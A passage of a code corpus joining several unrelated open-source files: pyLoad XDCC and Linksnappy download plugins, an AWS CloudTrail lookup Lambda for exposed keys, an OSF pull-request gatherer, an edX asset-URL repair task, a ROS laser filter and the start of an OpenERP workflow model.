    __license__ = "GPLv3"
    __authors__ = [("jeix", "jeix@hasnomail.com")]

    def setup(self):
        """Initialize per-download settings."""
        self.debug = 0  # 0,1,2
        self.timeout = 30
        self.multiDL = False

    def process(self, pyfile):
        """Entry point: attempt the XDCC download up to three times."""
        # change request type
        self.req = pyfile.m.core.requestFactory.getRequest(self.__name__, type="XDCC")

        self.pyfile = pyfile
        for _i in xrange(0, 3):
            try:
                nmn = self.doDownload(pyfile.url)
                self.logDebug("Download of %s finished." % nmn)
                return
            except socket.error, e:
                if hasattr(e, "errno"):
                    errno = e.errno
                else:
                    errno = e.args[0]

                if errno == 10054:
                    # connection reset by peer (WSAECONNRESET)
                    self.logDebug("Server blocked our ip, retry in 5 min")
                    self.setWait(300)
                    self.wait()
                    continue

                self.fail(_("Failed due to socket errors. Code: %d") % errno)

        self.fail(_("Server blocked our ip, retry again later manually"))

    def doDownload(self, url):
        """Connect to IRC, request the pack, and download it via DCC.

        Returns the path of the downloaded file.
        """
        self.pyfile.setStatus("waiting")  # real link

        m = re.match(r'xdcc://(.*?)/#?(.*?)/(.*?)/#?(\d+)/?', url)
        server = m.group(1)
        chan = m.group(2)
        bot = m.group(3)
        pack = m.group(4)
        nick = self.getConfig('nick')
        ident = self.getConfig('ident')
        real = self.getConfig('realname')

        temp = server.split(':')
        ln = len(temp)
        if ln == 2:
            host, port = temp
        elif ln == 1:
            host, port = temp[0], 6667
        else:
            self.fail(_("Invalid hostname for IRC Server: %s") % server)

        #######################
        # CONNECT TO IRC AND IDLE FOR REAL LINK
        dl_time = time()

        sock = socket.socket()
        sock.connect((host, int(port)))
        if nick == "pyload":
            nick = "pyload-%d" % (time() % 1000)  # last 3 digits
        sock.send("NICK %s\r\n" % nick)
        sock.send("USER %s %s bla :%s\r\n" % (ident, host, real))
        self.setWait(3)
        self.wait()
        sock.send("JOIN #%s\r\n" % chan)
        sock.send("PRIVMSG %s :xdcc send #%s\r\n" % (bot, pack))

        # IRC recv loop
        readbuffer = ""
        done = False
        retry = None
        m = None
        while True:
            # done is set if we got our real link
            if done:
                break

            if retry:
                if time() > retry:
                    retry = None
                    dl_time = time()
                    sock.send("PRIVMSG %s :xdcc send #%s\r\n" % (bot, pack))
            else:
                if (dl_time + self.timeout) < time():  # todo: add in config
                    sock.send("QUIT :byebye\r\n")
                    sock.close()
                    self.fail(_("XDCC Bot did not answer"))

            fdset = select([sock], [], [], 0)
            if sock not in fdset[0]:
                continue

            readbuffer += sock.recv(1024)
            temp = readbuffer.split("\n")
            readbuffer = temp.pop()  # keep any partial trailing line buffered

            for line in temp:
                # NOTE(review): "is 2"/"is 1" rely on CPython small-int
                # interning; these should use "==" comparisons
                if self.debug is 2:
                    print "*> " + unicode(line, errors='ignore')
                line = line.rstrip()
                first = line.split()

                if first[0] == "PING":
                    sock.send("PONG %s\r\n" % first[1])

                if first[0] == "ERROR":
                    self.fail(_("IRC-Error: %s") % line)

                msg = line.split(None, 3)
                if len(msg) != 4:
                    continue

                msg = {
                    "origin": msg[0][1:],
                    "action": msg[1],
                    "target": msg[2],
                    "text": msg[3][1:]
                }

                if nick == msg['target'][0:len(nick)] and "PRIVMSG" == msg['action']:
                    # answer common CTCP queries directed at us
                    if msg['text'] == "\x01VERSION\x01":
                        self.logDebug("Sending CTCP VERSION")
                        sock.send("NOTICE %s :%s\r\n" % (msg['origin'], "pyLoad! IRC Interface"))
                    elif msg['text'] == "\x01TIME\x01":
                        self.logDebug("Sending CTCP TIME")
                        sock.send("NOTICE %s :%d\r\n" % (msg['origin'], time()))
                    elif msg['text'] == "\x01LAG\x01":
                        pass  # don't know how to answer

                if not (bot == msg['origin'][0:len(bot)]
                        and nick == msg['target'][0:len(nick)]
                        and msg['action'] in ("PRIVMSG", "NOTICE")):
                    continue

                if self.debug is 1:
                    print "%s: %s" % (msg['origin'], msg['text'])

                if "You already requested that pack" in msg['text']:
                    retry = time() + 300

                if "you must be on a known channel to request a pack" in msg['text']:
                    self.fail(_("Wrong channel"))

                m = re.match('\x01DCC SEND (.*?) (\d+) (\d+)(?: (\d+))?\x01', msg['text'])
                if m:
                    done = True

        # get connection data
        ip = socket.inet_ntoa(struct.pack('L', socket.ntohl(int(m.group(2)))))
        port = int(m.group(3))
        packname = m.group(1)

        if len(m.groups()) > 3:
            self.req.filesize = int(m.group(4))

        self.pyfile.name = packname

        download_folder = self.config['general']['download_folder']
        filename = save_join(download_folder, packname)

        self.logInfo(_("Downloading %s from %s:%d") % (packname, ip, port))

        self.pyfile.setStatus("downloading")
        newname = self.req.download(ip, port, filename, sock, self.pyfile.setProgress)
        if newname and newname != filename:
            self.logInfo(_("%(name)s saved as %(newname)s") % {"name": self.pyfile.name, "newname": newname})
            filename = newname

        # kill IRC socket
        # sock.send("QUIT :byebye\r\n")
        sock.close()

        self.lastDownload = filename
        return self.lastDownload
| immenz/pyload | module/plugins/hoster/Xdcc.py | Python | gpl-3.0 | 6,756 |
import datetime
import collections
import boto3
cloudtrail = boto3.client('cloudtrail')
def lambda_handler(event, context):
    """Entry point: look up the last 24 hours of CloudTrail activity for the
    compromised user and return the input event enriched with summaries."""
    account_id = event['account_id']
    time_discovered = event['time_discovered']
    username = event['username']
    deleted_key = event['deleted_key']
    exposed_location = event['exposed_location']
    # look back over the 24 hours preceding "now"
    endtime = datetime.datetime.now()
    starttime = endtime - datetime.timedelta(hours=24)
    print('Retrieving events...')
    events = get_events(username, starttime, endtime)
    print('Summarizing events...')
    event_names, resource_names, resource_types = get_events_summaries(events)
    return {
        "account_id": account_id,
        "time_discovered": time_discovered,
        "username": username,
        "deleted_key": deleted_key,
        "exposed_location": exposed_location,
        "event_names": event_names,
        "resource_names": resource_names,
        "resource_types": resource_types
    }
def get_events(username, starttime, endtime):
    """ Retrieves detailed list of CloudTrail events that occured between the specified time interval.
    Args:
        username (string): Username to lookup CloudTrail events for.
        starttime(datetime): Start of interval to lookup CloudTrail events between.
        endtime(datetime): End of interval to lookup CloudTrail events between.
    Returns:
        (dict)
        Raw lookup_events response: up to 50 CloudTrail events occurring
        between the start and end time, with details for each event.
    """
    lookup_kwargs = {
        'LookupAttributes': [{'AttributeKey': 'Username',
                              'AttributeValue': username}],
        'StartTime': starttime,
        'EndTime': endtime,
        'MaxResults': 50,
    }
    try:
        return cloudtrail.lookup_events(**lookup_kwargs)
    except Exception as e:
        print(e)
        print('Unable to retrieve CloudTrail events for user "{}"'.format(username))
        raise
def get_events_summaries(events):
    """ Summarizes a CloudTrail events list into occurrence counts.
    Args:
        events (dict): Dictionary containing the list of CloudTrail events
            (under the "Events" key) to be summarized.
    Returns:
        (list, list, list)
        Three lists of (name, count) tuples: the ten most common event
        names, resource names, and resource types.
    """
    event_names = collections.Counter()
    resource_names = collections.Counter()
    resource_types = collections.Counter()
    for event in events['Events']:
        event_names[event.get('EventName')] += 1
        # "Resources" may be absent entirely; treat that as no resources
        for resource in (event.get("Resources") or []):
            resource_names[resource.get("ResourceName")] += 1
            resource_types[resource.get("ResourceType")] += 1
    return (event_names.most_common(10),
            resource_names.most_common(10),
            resource_types.most_common(10))
| robperc/Trusted-Advisor-Tools | ExposedAccessKeys/lambda_functions/lookup_cloudtrail_events.py | Python | apache-2.0 | 3,195 |
import json
import os
import re
from website.settings import GITHUB_API_TOKEN
from subprocess import check_output
GIT_LOGS_FILE = os.path.join('website', 'static', 'built', 'git_logs.json')
GIT_STATUS_FILE = os.path.join('website', 'static', 'built', 'git_branch.txt')
def gather_pr_data(current_branch='develop', master_branch='master'):
    """Compare `current_branch` against `master_branch` on GitHub and return
    a list of detailed PR data dicts for every merge commit between them.

    Requires website.settings.GITHUB_API_TOKEN to be configured.
    """
    import requests
    # matches "(#1234)" squash-merge suffixes and "Merge pull request #1234"
    regex = re.compile(ur'\(#([\d]{4,})\)|Merge pull request #([\d]{4,})')
    pr_data = []
    headers = {
        'Authorization': 'token %s' % GITHUB_API_TOKEN,
        'media_type': 'application/vnd.github.VERSION.sha',
    }
    # GET /repos/:owner/:repo/compare/hubot:branchname...octocat:branchname
    url_string = 'https://api.github.com/repos/centerforopenscience/osf.io/compare/{}...{}'
    url = url_string.format(master_branch, current_branch)
    res = requests.get(url, headers=headers)
    if res.status_code == 200:
        data = res.json()
        commits = data['commits']
        if commits:
            commits.reverse()  # newest commits first
        # NOTE(review): `index` is incremented but never used
        index = 0
        for item in commits:
            index += 1
            commit_message = item['commit']['message']
            found_list = re.findall(regex, commit_message)
            if found_list:
                # each match is a (squash_pr, merge_pr) pair; one side is empty
                pr_one, pr_two = found_list[0]
                pr = int(pr_one or pr_two)
                pr_data.append(get_pr_data(pr))
    return pr_data
def get_pr_data(pr):
    """Fetch pull request #`pr` from the GitHub API; return {} on failure."""
    import requests
    headers = {
        'Authorization': 'token %s' % GITHUB_API_TOKEN,
        'media_type': 'application/vnd.github.VERSION.sha',
    }
    # GET /repos/:owner/:repo/pulls/:number
    url = 'https://api.github.com/repos/centerforopenscience/osf.io/pulls/{}'.format(pr)
    res = requests.get(url, headers=headers)
    if res.status_code != 200:
        return {}
    return res.json()
def main():
    """Record the current git branch and, when a GitHub token is configured,
    dump PR data for commits ahead of master into the built assets."""
    current_branch = check_output(['git', 'rev-parse', '--abbrev-ref', 'HEAD']).rstrip()
    with open(GIT_STATUS_FILE, 'w') as f:
        f.write(current_branch)
    if GITHUB_API_TOKEN:
        pr_data = json.dumps(gather_pr_data(current_branch))
        with open(GIT_LOGS_FILE, 'w') as f:
            f.write(pr_data)


if __name__ == '__main__':
    main()
| jnayak1/osf.io | scripts/meta/gatherer.py | Python | apache-2.0 | 2,201 |
# -*- coding: utf-8 -*-
import json
import os
import time
import urllib.request
from pyload.core.network.http.http_request import FormFile
from pyload.core.utils import parse
from ..base.downloader import BaseDownloader
from ..helpers import exists
class LinksnappyComTorrent(BaseDownloader):
__name__ = "LinksnappyComTorrent"
__type__ = "downloader"
__version__ = "0.01"
__status__ = "testing"
__pattern__ = r'^unmatchable$'
__config__ = [
("enabled", "bool", "Activated", True),
("folder_per_package", "Default;Yes;No", "Create folder for each package", "Default"),
("max_wait", "int", "Reconnect if waiting time is greater than minutes", 10),
("del_finished", "bool", "Delete downloaded torrents from the server", True)
]
__description__ = """Linksnappy.com torrents crypter plugin"""
__license__ = "GPLv3"
__authors__ = [("GammaC0de", "nitzo2001[AT}yahoo[DOT]com")]
API_URL = "https://linksnappy.com/api/"
def api_response(self, method, **kwargs):
return json.loads(self.load(self.API_URL + method,
get=kwargs))
def sleep(self, sec):
for _i in range(sec):
if self.pyfile.abort:
break
time.sleep(1)
def send_request_to_server(self):
""" Send torrent/magnet to the server """
if self.pyfile.url.endswith(".torrent"):
#: torrent URL
if self.pyfile.url.startswith("http"):
#: remote URL, download the torrent to tmp directory
api_data = self.api_response("torrents/ADDURL", url=self.pyfile.url).items()[0][1]
if api_data['status'] == "FAILED" and api_data['error'] != "This torrent already exists in your account":
self.fail(api_data['error'])
torrent_id = api_data['torrentid']
else:
#: URL is local torrent file (uploaded container)
torrent_filename = urllib.request.url2pathname(self.pyfile.url[7:]) #: trim the starting `file://`
if not exists(torrent_filename):
self.fail(self._("Torrent file does not exist"))
#: Check if the torrent file path is inside pyLoad's temp directory
if os.path.abspath(torrent_filename).startswith(self.pyload.tempdir + os.sep):
#: send the torrent content to the server
api_data = self.load("https://linksnappy.com/includes/ajaxupload.php",
post={'torrents[]': FormFile(torrent_filename, mimetype="application/octet-stream")},
multipart=True)
api_data = list(json.loads(api_data).items())[0][1]
if api_data['error'] and api_data['error'] != "This torrent already exists in your account":
self.fail(api_data['error'])
torrent_id = api_data['torrentid']
else:
self.fail(self._("Illegal URL")) #: We don't allow files outside pyLoad's temp directory
else:
#: magnet URL, send to the server
api_data = self.api_response("torrents/ADDMAGNET", magnetlinks=self.pyfile.url)
if api_data['status'] != "OK":
self.fail(api_data['error'])
api_data = api_data['return'][0]
if api_data['status'] != "OK" and api_data['error'] != "This torrent already exists in your account":
self.fail(api_data['error'])
torrent_id = api_data['torrentid']
return torrent_id
def wait_for_server_dl(self, torrent_id):
    """ Show progress while the server does the download """
    # Initial status probe: fail fast on API or torrent-level errors.
    api_data = self.api_response("torrents/STATUS", tid=torrent_id)
    if api_data['status'] != "OK":
        self.fail(api_data['error'])
    if api_data['return']['status'] == "ERROR":
        self.fail(api_data['return']['error'])
    self.pyfile.name = api_data['return']['name']
    self.pyfile.set_custom_status("torrent")
    self.pyfile.set_progress(0)
    if api_data['return']['status'] != "FINISHED":
        # Kick off the server-side download of the torrent.
        api_data = self.api_response("torrents/START", tid=torrent_id)
        if api_data['status'] != "OK":
            if api_data['error'] == "Magnet URI processing in progress. Please wait.":
                # Magnet metadata is still resolving; retry START up to
                # 8 times, 3 seconds apart.
                for _i in range(8):
                    self.sleep(3)
                    api_data = self.api_response("torrents/START", tid=torrent_id)
                    if api_data['status'] == "OK":
                        break
                else:
                    # All retries exhausted without an OK.
                    self.fail(api_data['error'])
            elif api_data['error'] != "Already started.":
                # "Already started." is benign; anything else is fatal.
                self.fail(api_data['error'])
        # Poll STATUS every 2 seconds, mirroring the server-side progress
        # into pyLoad's progress bar until the torrent is finished.
        while True:
            api_data = self.api_response("torrents/STATUS", tid=torrent_id)
            if api_data['status'] != "OK":
                self.fail(api_data['error'])
            if api_data['return']['status'] == "ERROR":
                self.fail(api_data['return']['error'])
            torrent_size = api_data['return'].get('getSize')
            # Size may be reported late; set it only once it is known.
            if torrent_size is not None and self.pyfile.size == 0:
                self.pyfile.size = parse.bytesize(torrent_size)
            progress = int(api_data['return']['percentDone'])
            self.pyfile.set_progress(progress)
            if api_data['return']['status'] == "FINISHED":
                break
            self.sleep(2)
        self.pyfile.set_progress(100)
        self.sleep(1)
    # Ask the server to package the finished download as a zip; GENZIP
    # returns PENDING while packing, anything else but ERROR means done.
    self.pyfile.set_custom_status("makezip")
    self.pyfile.set_progress(0)
    while True:
        api_data = self.api_response("torrents/GENZIP", torrentid=torrent_id)
        if api_data['status'] == "ERROR":
            self.fail(api_data['error'])
        elif api_data['status'] == "PENDING":
            self.sleep(2)
        else:
            break
    self.pyfile.set_progress(100)
    # 'return' of the final GENZIP call is the downloadable zip URL.
    return api_data['return']
def delete_torrent_from_server(self, torrent_id):
    """Remove *torrent_id* (including its files) from the Linksnappy server."""
    params = {"tid": torrent_id, "delFiles": 1}
    self.api_response("torrents/DELETETORRENT", **params)
def setup(self):
    """Configure download options and bind the Linksnappy account session."""
    self.multiDL = True
    self.resume_download = True
    # Torrent zips come as a single stream; no chunked download.
    self.chunk_limit = 1
    if 'LinksnappyCom' not in self.pyload.account_manager.plugins:
        self.fail(self._("This plugin requires an active Linksnappy.com account"))
    self.account = self.pyload.account_manager.get_account_plugin("LinksnappyCom")
    # Plugin may be installed but have no configured account entries.
    if len(self.account.accounts) == 0:
        self.fail(self._("This plugin requires an active Linksnappy.com account"))
    self.load_account()
    #: Use the cookiejar of account plugin (for the logged on session cookie)
    cj = self.pyload.request_factory.get_cookie_jar("LinksnappyCom", self.account.user)
    self.req.set_cookie_jar(cj)
def process(self, pyfile):
    """Queue the torrent server-side, wait for it, then fetch the result zip."""
    queued_id = False
    try:
        queued_id = self.send_request_to_server()
        zip_url = self.wait_for_server_dl(queued_id)
        self.pyfile.name = os.path.basename(zip_url)
        self.download(zip_url)
    finally:
        # Clean up on the server even when the download failed, but only
        # if a torrent was actually created there.
        if queued_id is not False and self.config.get("del_finished"):
            self.delete_torrent_from_server(queued_id)
| vuolter/pyload | src/pyload/plugins/downloaders/LinksnappyComTorrent.py | Python | agpl-3.0 | 7,604 |
import csv
import datetime
import logging
import re
from io import StringIO
from urllib.parse import urljoin, urlparse
import pymongo
from bson.son import SON
from celery.task import Task, task
from django.conf import settings
from django.core.mail import EmailMessage
from django.db.models import Q
from django.utils.html import strip_tags
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from openedx.core.djangoapps.content.block_structure.api import update_course_in_cache
from openedx.core.djangoapps.content.course_overviews.models import CourseOverview
from pytz import UTC
from xmodule.assetstore.assetmgr import AssetManager
from xmodule.contentstore.content import StaticContent
from xmodule.exceptions import NotFoundError
from xmodule.modulestore import InvalidLocationError
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.exceptions import ItemNotFoundError
from xmodule.modulestore.mongo.base import MongoRevisionKey
log = logging.getLogger(__name__)
store = modulestore()
URL_RE = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
class AssetURLsTask(Task):
    """
    Celery task base whose success handler emails a CSV report.

    ``result`` maps course id -> list of asset dicts (keys ``name``,
    ``module``, ``available``); the report is attached to an email sent
    to the addresses given in the task kwargs.
    """

    def on_success(self, result, task_id, args, kwargs):
        email_ids = kwargs.get('email_ids')
        update_script = kwargs.get('update')
        # Last column reports whether assets were fixed ("Updated") or
        # merely detected ("Available"), depending on the run mode.
        last_column = 'Updated' if update_script else 'Available'
        headers = ['Asset', 'Course', 'Module', last_column]
        # `available` may be absent; normalize to a plain bool instead of
        # the previous `== True` comparison (PEP 8 E712).
        rows = [
            [asset.get('name'), course, asset.get('module'), bool(asset.get('available'))]
            for course, assets in result.items()
            for asset in assets
        ]
        assets_report = StringIO()
        writer = csv.writer(assets_report)
        writer.writerow(headers)
        writer.writerows(rows)
        subject = '{} assets with incorrect urls task completed'.format('Update' if update_script else 'Get')
        email = EmailMessage(subject, '', settings.DEFAULT_FROM_EMAIL, email_ids)
        email.attach('platform_assets_report.csv', assets_report.getvalue(), 'text/csv')
        email.send(fail_silently=False)
def update_courses_cache(course_ids):
    """
    Update the block-structure cache for each course so API reads are fresh.

    Per-course failures are skipped so one broken course does not abort
    the whole batch.
    """
    for course_id in course_ids:
        course_key = CourseKey.from_string(course_id)
        try:
            update_course_in_cache(course_key)
        # Deliberately broad best-effort handling, but no longer a bare
        # ``except:`` that would also swallow SystemExit/KeyboardInterrupt.
        except Exception:
            continue
def get_block_location(studio_url, course_id, block):
    """
    Return the Studio URL at which the given modulestore *block* is edited.

    Special-cases the course "about" overview, static tabs and course
    updates; everything else maps to the generic container editor.
    """
    block_id = block.get('_id', {})
    category = block_id.get('category')
    name = block_id.get('name')
    if category == 'about' and name == 'overview':
        return '{domain}/settings/details/{course_id}'.format(
            domain=studio_url,
            course_id=course_id
        )
    if category == 'static_tab':
        return '{domain}/tabs/{course_id}'.format(
            domain=studio_url,
            course_id=course_id
        )
    if category == 'course_info' and name == 'updates':
        return '{domain}/course_info/{course_id}'.format(
            domain=studio_url,
            course_id=course_id
        )
    return '{domain}/container/i4x://{org}/{course}/{category}/{name}'.format(
        domain=studio_url,
        org=block_id.get('org'),
        course=block_id.get('course'),
        category=category,
        name=name
    )
@task(
    name='lms.djangoapps.api_integration.tasks.get_assets_with_incorrect_urls',
    bind=True,
    base=AssetURLsTask
)
def get_assets_with_incorrect_urls(
    self, course_ids, course_type, email_ids,
    environment, studio_url, staff_user_id, update
):
    """
    Scan courses for asset URLs pointing at other servers/courses.

    When ``update`` is truthy the URLs are rewritten in place and the
    course caches refreshed. Returns a mapping of course id to the list
    of suspicious assets found (consumed by AssetURLsTask.on_success,
    which emails the CSV report).
    """
    task_id = self.request.id
    if not course_ids:
        # No explicit course list: select courses by end date instead.
        if course_type == 'close':
            # Courses that have already ended.
            course_ids = CourseOverview.objects.filter(
                Q(end__lte=datetime.datetime.today().replace(tzinfo=UTC))
            ).values_list('id', flat=True)
        else:
            # Courses still running, or with no end date at all.
            course_ids = CourseOverview.objects.filter(
                Q(end__gte=datetime.datetime.today().replace(tzinfo=UTC)) |
                Q(end__isnull=True)
            ).values_list('id', flat=True)
    courses_assets = dict()
    for course_id in course_ids:
        course_assets = find_asset_urls_in_course(task_id, course_id, environment, studio_url, staff_user_id, update)
        # Only courses with at least one suspicious asset appear in the report.
        if course_assets:
            courses_assets[course_id] = course_assets
    if update:
        update_courses_cache(course_ids)
    return courses_assets
def find_asset_urls_in_course(task_id, course_id, environment, studio_url, staff_user_id, update):
    """
    Scan the published blocks of one old-mongo course for asset URLs that
    point at another server or course; optionally rewrite them in place.

    Returns a list of asset-info dicts for every suspicious URL found.
    """
    course_key = CourseKey.from_string(course_id)
    query = SON([
        ('_id.tag', 'i4x'),
        ('_id.org', course_key.org),
        ('_id.course', course_key.course),
        ('_id.revision', MongoRevisionKey.published),
    ])
    _store = store._get_modulestore_for_courselike(course_key)
    # split_mongo based courses are not supported
    if not hasattr(_store, 'collection'):
        return []
    blocks = list(_store.collection.find(
        query,
        sort=[('_id.revision', pymongo.DESCENDING)],
    ))
    course_assets = []
    blocks_to_update = []
    for block in blocks:
        block_loc = get_block_location(
            studio_url=studio_url,
            course_id=course_id,
            block=block
        )
        block_assets = list()
        # Mutates `block` in place when update=True; collects findings
        # into `block_assets`.
        _find_asset_urls_in_block(
            task_id, block, block_loc, block_assets, course_key,
            environment, staff_user_id, update
        )
        if block_assets:
            course_assets.extend(block_assets)
            blocks_to_update.append(block)
    if update and blocks_to_update:
        # Persist the mutated raw documents back through the modulestore.
        for module in _store._load_items(course_key, blocks_to_update):
            if hasattr(module.parent, 'block_id'):
                block_loc = module.parent.block_id
            else:
                block_loc = module.location
            try:
                store.update_item(xblock=module, user_id=staff_user_id)
            # BUGFIX: narrowed from a bare ``except:`` which would also
            # swallow SystemExit/KeyboardInterrupt; still intentionally
            # broad so one broken module does not abort the course scan.
            except Exception:
                log.info('[{}] Error updating module `{}` in course `{}`. Skipping..'
                         .format(task_id, block_loc, course_id))
                continue
    return course_assets
def _find_asset_urls_in_block(
    task_id, value, block_loc,
    block_assets, course_key,
    environment, staff_user_id,
    update,
    dictionary=None,
    value_key=None,
):
    """
    Recursively walk a block's raw document and collect/replace asset URLs.

    ``dictionary``/``value_key`` reference the parent container of the
    current string so a rewritten value can be written back in place.
    Findings are appended to ``block_assets`` as dicts with keys
    ``name``, ``module`` and ``available``.
    """
    # BUGFIX: use isinstance() instead of ``type(x) == dict/list`` and the
    # broken ``type(value) in (str, str)`` (a leftover of the Python 2
    # ``(str, unicode)`` tuple that tested str twice).
    if isinstance(value, dict):
        for key, val in value.items():
            _find_asset_urls_in_block(
                task_id, val, block_loc, block_assets,
                course_key, environment, staff_user_id, update,
                dictionary=value, value_key=key
            )
    elif isinstance(value, list):
        for item in value:
            _find_asset_urls_in_block(
                task_id, item, block_loc, block_assets,
                course_key, environment, staff_user_id, update,
                dictionary=dictionary, value_key=value_key
            )
    elif isinstance(value, str):
        save_updated = False
        urls = re.findall(URL_RE, value)
        for url in urls:
            url = strip_tags(url)
            parsed_url = urlparse(url)
            asset_url = StaticContent.ASSET_URL_RE.match(parsed_url.path)
            if asset_url is not None:
                # check if asset URL belongs to some other server or course
                if parsed_url.hostname != environment or \
                        asset_url.groupdict().get('course') != course_key.course or \
                        asset_url.groupdict().get('org') != course_key.org:
                    asset_info = {'name': asset_url.groupdict().get('name'), 'module': block_loc, 'available': False}
                    asset_path = '{}{}'.format(
                        StaticContent.get_base_url_path_for_course_assets(course_key),
                        asset_url.groupdict().get('name')
                    )
                    # check if asset exists in this course
                    try:
                        loc = StaticContent.get_location_from_path(asset_path)
                    except (InvalidLocationError, InvalidKeyError):
                        pass
                    else:
                        try:
                            AssetManager.find(loc, as_stream=True)
                        except (ItemNotFoundError, NotFoundError):
                            pass
                        else:
                            asset_info['available'] = True
                    if update:
                        # replace url with the `asset_path`
                        full_asset_path = urljoin('https://{}'.format(environment), asset_path)
                        value = value.replace(url, full_asset_path, 1)
                        save_updated = True
                        log.info('[{}] Replacing `{}` with new path `{}` in module `{}`'
                                 .format(task_id, url, full_asset_path, block_loc))
                    block_assets.append(asset_info)
        if urls and save_updated and update:
            # Write the rewritten string back into its parent container.
            dictionary[value_key] = value
| edx-solutions/api-integration | edx_solutions_api_integration/tasks/get_assets_with_incorrect_urls.py | Python | agpl-3.0 | 9,506 |
from brightness_vars import *
from models import *
from step_algorithms import *
from chain_generators import *
| HIPS/firefly-monte-carlo | flymc/__init__.py | Python | mit | 112 |
#!/usr/bin/env python
import rospy
from sensor_msgs.msg import LaserScan
def callback(data):
    """Replace out-of-range readings with a fixed 4.9 value and republish."""

    def _sanitize(range_val):
        # Option 1 of the original design: conform readings to a fixed
        # in-range value (4.9) rather than to data.range_max/range_min,
        # so the advertised limits never get overwritten by the data
        # (option 2, adapting range_max/range_min to the data, is off).
        if range_val > data.range_max or range_val < data.range_min:
            return 4.9
        return range_val

    data.ranges = [_sanitize(r) for r in data.ranges]
    pub.publish(data)
# Initializes everything
def start():
    """Initialize the node, wire the subscriber/publisher pair, and spin."""
    rospy.init_node("laser_filter")
    # Topic name is configurable via a private param; defaults to "xv11".
    scan_topic = rospy.get_param("~scan_topic", "xv11")
    global pub
    # Filtered scans are republished on "<scan_topic>_filtered".
    pub = rospy.Publisher(scan_topic + "_filtered", LaserScan, queue_size=10)
    rospy.Subscriber(scan_topic, LaserScan, callback)
    rospy.spin()


if __name__ == "__main__":
    start()
| chrisl8/ArloBot | arlobot_ros/scripts/laser_filter.py | Python | mit | 1,311 |
from . import test_stock_orderpoint_move_link
| OCA/stock-logistics-warehouse | stock_orderpoint_move_link/tests/__init__.py | Python | agpl-3.0 | 46 |
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp import netsvc
class workflow(osv.osv):
    """A workflow definition attached to a business object model (``osv``)."""
    _name = "workflow"
    _table = "wkf"
    _order = "name"
    _columns = {
        'name': fields.char('Name', size=64, required=True),
        # Model the workflow is bound to (e.g. 'sale.order').
        'osv': fields.char('Resource Object', size=64, required=True,select=True),
        # When set, an instance is started automatically on record creation.
        'on_create': fields.boolean('On Create', select=True),
        'activities': fields.one2many('workflow.activity', 'wkf_id', 'Activities'),
    }
    _defaults = {
        'on_create': lambda *a: True
    }

    def write(self, cr, user, ids, vals, context=None):
        # Any change to a workflow invalidates the in-memory workflow cache.
        if not context:
            context={}
        wf_service = netsvc.LocalService("workflow")
        wf_service.clear_cache(cr, user)
        return super(workflow, self).write(cr, user, ids, vals, context=context)

    def get_active_workitems(self, cr, uid, res, res_id, context=None):
        """Return the workflow info and active workitem counts for one record.

        Result: {'wkf': <wkf row or None>, 'workitems': {act_id: count}}.
        """
        cr.execute('select * from wkf where osv=%s limit 1',(res,))
        wkfinfo = cr.dictfetchone()
        workitems = []
        if wkfinfo:
            cr.execute('SELECT id FROM wkf_instance \
                        WHERE res_id=%s AND wkf_id=%s \
                        ORDER BY state LIMIT 1',
                       (res_id, wkfinfo['id']))
            inst_id = cr.fetchone()
            cr.execute('select act_id,count(*) from wkf_workitem where inst_id=%s group by act_id', (inst_id,))
            workitems = dict(cr.fetchall())
        return {'wkf': wkfinfo, 'workitems': workitems}

    def create(self, cr, user, vals, context=None):
        # New workflows also invalidate the cache.
        if not context:
            context={}
        wf_service = netsvc.LocalService("workflow")
        wf_service.clear_cache(cr, user)
        return super(workflow, self).create(cr, user, vals, context=context)
workflow()
class wkf_activity(osv.osv):
    """A node of a workflow graph; may run code, spawn a subflow or stop flows."""
    _name = "workflow.activity"
    _table = "wkf_activity"
    _order = "name"
    _columns = {
        'name': fields.char('Name', size=64, required=True),
        'wkf_id': fields.many2one('workflow', 'Workflow', required=True, select=True, ondelete='cascade'),
        # How outgoing/incoming transitions combine (XOR: exactly one, ...).
        'split_mode': fields.selection([('XOR', 'Xor'), ('OR','Or'), ('AND','And')], 'Split Mode', size=3, required=True),
        'join_mode': fields.selection([('XOR', 'Xor'), ('AND', 'And')], 'Join Mode', size=3, required=True),
        'kind': fields.selection([('dummy', 'Dummy'), ('function', 'Function'), ('subflow', 'Subflow'), ('stopall', 'Stop All')], 'Kind', size=64, required=True),
        'action': fields.text('Python Action'),
        'action_id': fields.many2one('ir.actions.server', 'Server Action', ondelete='set null'),
        'flow_start': fields.boolean('Flow Start'),
        'flow_stop': fields.boolean('Flow Stop'),
        'subflow_id': fields.many2one('workflow', 'Subflow'),
        'signal_send': fields.char('Signal (subflow.*)', size=32),
        'out_transitions': fields.one2many('workflow.transition', 'act_from', 'Outgoing Transitions'),
        'in_transitions': fields.one2many('workflow.transition', 'act_to', 'Incoming Transitions'),
    }
    _defaults = {
        'kind': lambda *a: 'dummy',
        'join_mode': lambda *a: 'XOR',
        'split_mode': lambda *a: 'XOR',
    }

    def unlink(self, cr, uid, ids, context=None):
        # Refuse deletion while live workitems still reference the activity,
        # unless the caller explicitly forces it via context.
        if context is None: context = {}
        if not context.get('_force_unlink') and self.pool.get('workflow.workitem').search(cr, uid, [('act_id', 'in', ids)]):
            raise osv.except_osv(_('Operation forbidden'),
                                 _('Please make sure no workitems refer to an activity before deleting it!'))
        super(wkf_activity, self).unlink(cr, uid, ids, context=context)
wkf_activity()
class wkf_transition(osv.osv):
    """A directed edge between two activities, guarded by signal/group/condition."""
    _table = "wkf_transition"
    _name = "workflow.transition"
    _rec_name = 'signal'
    _columns = {
        'trigger_model': fields.char('Trigger Object', size=128),
        'trigger_expr_id': fields.char('Trigger Expression', size=128),
